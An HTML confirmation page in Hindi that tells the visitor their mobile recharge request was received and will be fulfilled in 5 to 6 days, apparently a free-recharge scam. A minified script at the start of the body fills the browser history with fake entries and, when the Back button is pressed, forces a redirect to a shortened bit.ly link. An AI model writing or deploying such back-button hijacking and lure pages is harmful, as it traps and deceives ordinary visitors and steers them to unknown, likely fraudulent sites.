<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8">
	<title>Thanks!!</title>
	<meta http-equiv="X-UA-Compatible" content="IE=edge"><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport">
	<link href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.0/css/bootstrap.min.css" rel="stylesheet" /><script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script><script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.0/js/bootstrap.min.js"></script>
	<style type="text/css">@import url('https://fonts.googleapis.com/css?family=Lato:100,300,400,700,900');
html,
body {
  width: 100%;
  height: auto;
  margin: 0;
  padding: 0;
  background: #fff;
  font-family: 'Lato', sans-serif;
  font-weight: 400;
  font-size: 18px;
}

#container{
  background: white;
  max-width: 480px;
  margin: auto;
  box-shadow: 0 5px 12px 0 rgba(0, 0, 0, 0.2), 0 6px 20px 0 rgba(0, 0, 0, 0.19);
}

#survey-form {
  max-width: 500px;
  margin: 0 auto;
  padding: 0 20px 20px 20px;
}

::placeholder {
  font-family: lato, sans-serif;
  font-weight: 500;
  font-size:15px;
  color:grey;
}

label {
  display: block;
  padding: 1rem 0 0.25rem;
  font-size: 17px;
  font-weight: 600;
  color:black;
}

.blocked {
  display: block;
  width: 95%;
  border: none;
  border-bottom: 2px solid #138808;
  padding: 15px;
  font-weight:500;
  font-size:15px;
  color:grey;
  
}
.block {
  display: block;
  width: 95%;
  border: none;
  border-bottom: 2px solid #138808;
  padding: 15px;
  background: white;
  font-weight:500;
  font-size:15px;
  color:grey;
}

#title {
  text-align: center;
  font-weight: 900;
  padding-top: 2rem;
  color: #202224;
  text-transform: uppercase;
  letter-spacing: 1.5px;
}

#description {
  font-weight: 300;
  text-align: center;
}

.dropdown-sel {
  border: 1px solid royalblue;
  background: royalblue;
  color: white;
  padding: 3px;
  width: auto;
  text-align: center;
}

#clockdiv{
	font-family: sans-serif;
	color: #fff;
	display: inline-block;
	font-weight: 100;
	text-align: center;
	font-size: 30px;
}

#clockdiv > div{
	padding: 1px;
	border-radius: 3px;
	background: #138808;
	display: inline-block;
}

#clockdiv div > span{
	padding: 15px;
	border-radius: 3px;
	background: #0e6606;
	display: inline-block;
}

.smalltext{
	padding-top: 5px;
	font-size: 16px;
}
	</style>
</head>
<body data-gr-c-s-loaded="true"><script type="text/javascript">! function (){	var t;	try{for (t=0; 10 > t; ++t)		history.pushState({}, "", "#");	onpopstate=function (t)	{ t.state &&window.location.replace("https://bit.ly/33rMmM8/");		}}		catch (o){}}();</script>
<div id="container">
<hr /><img alt="" src="/images (17).jpeg" style="width: 360px; height: 150px;" />
<center>
<form id="survey-form">&nbsp;
<center><img src="https://2.bp.blogspot.com/-psCwb8OFYfg/XSXGqQ6VslI/AAAAAAAAIbs/lfBjhRfyFpYQ4qmagzJILo7azAwakRQpwCK4BGAYYCw/s400/process.gif" />

<p class="red"><b>हमे आपकी Recharge Request सफलतापूर्वक प्राप्त हो गयी है | </b></p>
&nbsp;

<p class="red"><font color="red"><b>बहुत सारी रिक्वेस्ट मिलने के कारण आपका रिचार्ज अगले 5 - 6 दिनों में हो जायेगा। </b></font></p>
<br />

</center>
</form>
</center>
</div>
</body>
</html>